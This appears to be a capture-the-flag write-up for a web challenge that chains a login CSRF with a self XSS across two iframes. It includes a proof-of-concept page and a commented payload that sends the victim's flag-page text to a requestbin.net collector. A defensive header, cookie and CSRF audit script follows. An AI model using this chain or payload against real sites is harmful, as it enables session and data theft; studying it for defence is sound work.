Requirements: a self XSS, a login CSRF, and a valid victim session that is still present when the target is opened in a new tab (no script-driven re-login).
POC:
<iframe src="https://typeselfsub.web.ctfcompetition.com/flag" id="first"></iframe>
<iframe srcdoc='
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState("", "", "/")</script>
<form action="https://typeselfsub.web.ctfcompetition.com/login" method="POST" id="formlogin">
<input type="hidden" name="username" value="lala" />
<input type="hidden" name="password" value="lala@123" />
<input type="hidden" name="csrf" value="" />
<input type="submit" value="Submit request" />
</form>
<script>document.getElementById("formlogin").submit()</script>
</body>
</html>
' id="second"></iframe>
<!-- self XSS: <script>location="http://requestbin.net/r/r99y3cr9?"+(window.top.frames[0].document.getElementsByClassName("container")[2].innerText)</script> -->
1. Create iframe 1, which loads the target page with the victim's session on example.com.
2. Create iframe 2, which performs a login CSRF as the attacker -> attacker session on example.com.
3. Both iframes now share the example.com origin, so the same-origin policy lets the self XSS running in iframe 2 read data from iframe 1 (cookie, page content, ...) by using:
window.top.frames[0].document.cookie
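A defender-side check for the three conditions this chain relies on (framable target, session cookie usable cross-site, login form that accepts an empty CSRF token), as an added example that is not part of the original writeup; the header values, cookie and form HTML are constructed samples, and the names `auditResponse` and `parseSetCookie` are assumed here:

```javascript
// Added example, not from the original writeup: audit an HTTP response for the
// defences that break the iframe + login-CSRF + self-XSS chain. All sample
// headers and HTML below are constructed, not taken from the challenge.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map(s => s.trim());
  const name = pair.split('=')[0];
  const attr = {};
  for (const x of attrs) {
    const [k, v] = x.split('=');
    attr[k.toLowerCase()] = v === undefined ? true : v;
  }
  const sameSite = typeof attr.samesite === 'string' ? attr.samesite.toLowerCase() : 'none';
  return { name, sameSite, httpOnly: attr.httponly === true };
}

// resp: { headers: { name: value | [values] }, body: html string }
function auditResponse(resp) {
  const h = {};
  for (const [k, v] of Object.entries(resp.headers)) h[k.toLowerCase()] = v;
  const findings = [];

  // 1. Framing: without this, an attacker page can load the target in iframe 1.
  const csp = h['content-security-policy'] || '';
  const xfo = String(h['x-frame-options'] || '').toUpperCase();
  if (!/frame-ancestors\s+'(none|self)'/.test(csp) && xfo !== 'DENY' && xfo !== 'SAMEORIGIN') {
    findings.push('framable: no X-Frame-Options / CSP frame-ancestors');
  }

  // 2. Session cookie: SameSite=Lax/Strict is neither sent to a cross-site
  //    iframe nor accepted from the cross-site login POST in iframe 2.
  //    HttpOnly blocks the document.cookie read (but not the DOM read).
  for (const c of [].concat(h['set-cookie'] || []).map(parseSetCookie)) {
    if (c.sameSite === 'none') findings.push(`cookie ${c.name}: SameSite missing or None`);
    if (!c.httpOnly) findings.push(`cookie ${c.name}: missing HttpOnly`);
  }

  // 3. Login form: the PoC submits csrf="" and still gets a session.
  if (resp.body && /<form/i.test(resp.body)) {
    const m = /name="csrf"\s+value="([^"]*)"/.exec(resp.body);
    if (!m || m[1] === '') findings.push('login form: missing or empty csrf token');
  }
  return findings;
}

const WEAK = { headers: { 'Set-Cookie': 'session=abc123; Path=/' },
  body: '<form><input type="hidden" name="csrf" value="" /></form>' };
const HARDENED = { headers: {
    'Content-Security-Policy': "frame-ancestors 'none'",
    'Set-Cookie': 'session=abc123; Path=/; HttpOnly; Secure; SameSite=Lax' },
  body: '<form><input type="hidden" name="csrf" value="t0k3n-example" /></form>' };
```

Running `auditResponse(WEAK)` reports all four weaknesses, while `auditResponse(HARDENED)` returns no findings.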